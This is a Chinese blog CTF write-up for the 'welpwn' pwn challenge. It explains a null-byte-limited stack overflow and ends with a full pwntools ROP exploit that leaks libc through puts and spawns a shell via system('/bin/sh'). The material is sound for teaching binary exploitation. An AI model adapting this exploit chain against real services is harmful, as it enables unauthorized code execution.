攻防世界PWN之Welpwn题解

最新推荐文章于 2023-06-09 21:40:10 发布
最新推荐文章于 2023-06-09 21:40:10 发布
阅读量1.5k 收藏 7
点赞数 7
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN 二进制漏洞 CTF 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/102944448
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

首先用IDA查看

发现主函数不能栈溢出,我们看看echo这个函数

echo会把主函数输入的字符串复制到局部的s2里,并且s2只有16字节,可以造成溢出。Echo函数先循环复制字符到s2,如果遇到0,就结束复制,然后输出s2。因此,我们如果想直接覆盖函数返回地址,那么我们的目标函数必须没有参数,否则,我们用p64(…)包装地址时,必然会出现0。

比如我们的payload为payload = 'a'*0x18 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)

由于是64为包装,因此payload字符串为’a’*0x18 + ‘\xa3\x08\x40\x00\x00\x00\x00\x00’ + ‘……’

这意味着,payload后面的两个地址不会被复制到s2,因为前面遇到了0,那么这样我们就不能正确调用出system(“/bin/sh”)

 

那么,我们来分析一下,该如何达到目的

首先,进入echo函数后,栈中数据是这样的

0000000000000000

0x10字节数据区

0000000000000000

echo函数栈的ebp

echo函数返回地址

0000000000000000

0x400字节数据区

0000000000000000

0000000000000000

0000000000000000

0000000000000000

…………….

main函数栈的ebp

假如我们在buf中输入的0x400个a字符,那么栈变成这样了

aaaaaaaa

0x10字节数据区

aaaaaaaa

aaaaaaaa

aaaaaaaa

aaaaaaaa

0x400字节数据区

aaaaaaaa

aaaaaaaa

aaaaaaaa

aaaaaaaa

…………….

main函数栈的ebp

因为没有在中途遇到0,所以echo中的循环一直复制buf中的数据到s2中,造成溢出。

现在,假如我们的payload = 'a'*0x18 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)

那么,栈中的数据变成这样

aaaaaaaa

0x10字节数据区

aaaaaaaa

aaaaaaaa

echo函数栈的ebp

pop_rdi_addr

echo函数返回地址

aaaaaaaa

0x400字节数据区

aaaaaaaa

aaaaaaaa

pop_rdi_addr

Binsh_addr

system_addr

main函数栈的ebp

 

这样的话,echo执行完后,跳到pop_rdi地址处执行,然而,pop_rdi执行完后,栈顶指针esp指向buf+0x8 ,即aaaaaaaa,这里不是地址,因此程序崩溃结束。然而,如果,我们在buf+0x8处存储其他函数地址,也是不可行的,因为该地址是64位,末尾几位有0,这会导致我们还没溢出s2就已停止数据复制。

 

因此,我们有以下总结

buf的前24字节不能 存地址数据,只存普通数据。buf+24处应该存某一地址,且该地址处有四个pop指令,和一个retn指令。这样,四次pop后,就相当于跳过了24字节数据和自己本身8字节地址数据。在接下来的地址处,我们就可以写其他函数。

 

0x40089C处正好有四个pop和一个retn

 

假如我们的payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)

那么栈布局如下

aaaaaaaa

0x10字节数据区

aaaaaaaa

aaaaaaaa

echo函数栈的ebp

pop_24_addr

echo函数返回地址

aaaaaaaa

0x400字节数据区

aaaaaaaa

aaaaaaaa

pop_24_addr

pop_rdi

write_got

puts_plt

main_addr

main函数栈的ebp

 

那么,echo函数执行完以后,跳到pop_24地址处,由于跳转后,栈顶指针指向buf,出栈4个后,指针指向buf+32 ,接下来遇到retn,出栈一个元素为(pop_rdi)作为pop_24的返回地址,这样跳转到了pop_rdi,后面类似。我们调用system 获取到shell

 

我们最终的exp脚本如下:

 

  1. #coding:utf8  
  2. from pwn import *  
  3. from LibcSearcher import *  
  4.   
  5. context.log_level  = 'debug'  
  6. sh = process('./pwnh13')  
  7. #sh = remote('111.198.29.45',51867)  
  8. elf = ELF('./pwnh13')  
  9. write_got = elf.got['write']  
  10. puts_plt = elf.plt['puts']  
  11. #此处有4pop指令,用于跳过24字节  
  12. pop_24 = 0x40089C  
  13. #pop rdi的地址,用来传参,具体看x64的传参方式  
  14. pop_rdi = 0x4008A3  
  15.   
  16. sh.recvuntil('Welcome to RCTF\n')  
  17.   
  18. main_addr = 0x4007CD  
  19. #本题的溢出点在echo函数里,然而,当遇到0,就停止了数据的复制,因此我们需要pop_24来跳过24个字节  
  20. payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr)  
  21.   
  22. sh.send(payload)  
  23.   
  24. sh.recvuntil('\x40')  
  25. #泄露write地址  
  26. write_addr = u64(sh.recv(6).ljust(8,'\x00'))  
  27.   
  28. libc = LibcSearcher('write',write_addr)  
  29. #获取libc加载地址  
  30. libc_base = write_addr - libc.dump('write')  
  31. #获取system地址  
  32. system_addr = libc_base + libc.dump('system')  
  33. #获取/bin/sh地址  
  34. binsh_addr = libc_base + libc.dump('str_bin_sh')  
  35.   
  36. sh.recvuntil('\n')  
  37. payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)  
  38.   
  39. sh.send(payload)  
  40. sh.interactive()  
ha1vk
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1039
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
攻防世界 welpwn WP
Zarcs_233的博客
01-29 920
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
攻防世界)(pwnwelpwn
PLpa的博客
07-18 2694
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
攻防世界welpwn
weixin_56777139的博客
03-08 195
攻防世界welpwn
[攻防世界]-welpwn
m0_55906008的博客
12-05 560
pwn
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
welpwn pwn 入门题
02-11
pwn 入门题
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
welpwn::sparkling_heart:CTFpwn框架
02-04
welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位...
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2506
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
pwn-welpwn
醉等佳人归
09-08 259
1.题目 1.保护机制 开启nx 2.关键代码 主函数 echo函数 2.思路 重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode 重点2:这次试用了LibcSearcher库来完成函数地址泄漏 from pwn import * from ctypes imp
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 850
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
welpwn [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列24
重新启程
12-27 1210
题目地址:welpwn 本题是高手进阶区的第13题,先看看题目 照例检查一下保护机制 [*] '/ctf/work/python/welpwn/a9ad88f80025427592b35612be5492fd' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found ...
welpwn(xctf)
weixin_43868725的博客
06-15 235
0x0 程序保护和流程 保护: 流程: main() echo() echo函数中存在明显的栈溢出漏洞。 0x1 利用过程 使用x64的通用gadget,泄露write函数的地址。使用LibcSearcher查出相应的libc,得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的,exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数,发现在写入s2的时候/x00会被截断,这种截断
justctf 2023 pwn Welcome in my house
z1r0的博客
06-09 126
然后这里user需要为root才可以得到flag,user默认是admin并存放在一个chunk里,但是可以利用house of force申请到存放user的chunk那里,改成root,最后2即可得到flag。堆溢出,可以申请任意大小的size,所以可以使用house of force。
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 632
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
PWN系列】攻防世界pwn进阶区welpwn分析
Vicl1fe的博客
10-11 461
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 分析 下载文件直接拖入ida分析。开了NX保护,一般就是rop 函数代码也比较简单。read那里也不存溢出。都是0x400。 紧接着调用了echo函数。 在echo函数中,将大小为0x400的buf中的值复制给大小为0x10的s2,。很明显会造成溢出。唯一的问题就是,如果Buf中含有\x00。会中断循环。 函数运行的整体流程就是,用户输入的字符串会存放到buf中,在echo函数中,将buf复制到s2时造成了溢出。通过循
xctf_pwn welpwn writeup
yagamilaido的博客
05-16 376
xctf_pwn3 welpwn 文章目录xctf_pwn3 welpwn程序分析exp思路 程序分析 惯例查信息 程序逻辑简单粗暴,读0x400字节(这里无法溢出)。 然后echo中打印,打印前拷贝到16字节数组中,存在栈溢出 3、考虑x86_64下著名万能ROP,一直没怎么用过这次拿来练练手(捂脸) _libc_csu_init 函数下的 pop&call ​ 注意 0x0000000000400880,可知道 r13、r14、r15 分别对应前三个参数,r12保存调用地址的
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值